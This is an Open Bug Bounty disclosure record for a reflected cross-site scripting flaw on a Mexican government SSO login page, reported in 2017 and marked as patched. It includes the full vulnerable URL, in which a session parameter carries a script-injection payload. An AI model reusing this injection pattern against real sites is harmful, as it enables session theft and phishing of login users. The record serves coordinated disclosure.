scsso.fone.sep.gob.mx XSS vulnerability

2017-01-06T15:33:00
ID OBB:203630
Type openbugbounty
Reporter Spam404
Modified 2017-04-03T06:13:00

Description

Vulnerable URL:
https://www.scsso.fone.sep.gob.mx/authenticationendpoint/login.do?SAMLRequest=jZNBb9swDIXv+xWC7nEcp0UWIXaRpehmoNu8xO1hl0FxmFaALHkinbr/fpLjrDkUQa8S+d7jJ2px09WaHcChsiblkyjmDExld8o8pfyhvBt95jfZpwXKWjdi2dKzWcPfFpDYEhEc+baVNdjW4DbgDqqCh/V9yp+JGhTjca0a60jqaG8NRAhN9GS3Ud2NOVsSObVtCY793nAQyM0OOp8lmc6Tq+v51ZyzO+sq6N1TvpcagbP8NuU+bI6FRFQHeLtAbL0GkjSU8iSeXI/i+WgSl/FUTGdimkTz2ew3Z4WzZCurvyhznLZ1RliJCoWRNaCgSmyW3+9FEsVieyxC8a0si1Hxc1Ny9niilgRqnqNB0XO6LNUMvjwbqPaB3ccF5Ak8z0J1EiHar04qjX9qVfS4F+Nz6ZPRDy+V3xZWq+qVLbW2LysHkjw6ci30lGtJl83DidqN9n2paAICJDDE2aYI+r9aqdVegUt5HnLy8cl92BvY9e/oH52gI7aydSOdwsAROlnRgEWcV620n3kN+zNGH0Z0sawSVZD2x2GLXqzbha2AyqcsnTQYlvfI8t082Ynzu7P9vz3/Ntk/&issuer;=saml2.ssoGrails_miPortal&sessionDataKey;=a121acee-7e59-4b39-9830-e1bd487f4620%27%22--!%3E%3CScript%20/K/%3Econfirm`OPENBUGBOUNTY`%3C/script%20/K/%3E&type;=samlsso&commonAuthCallerPath;=..%2F..%2Fsamlsso&forceAuthenticate;=true

Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| Unknown / Not calculated
VIP website status:| No
scsso.fone.sep.gob.mx SSL connection grade:| A-

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 January, 2017 15:33 GMT
Vulnerability existence verified and confirmed| 9 January, 2017 06:05 GMT
Vulnerability details disclosed by researcher| 3 April, 2017 06:13 GMT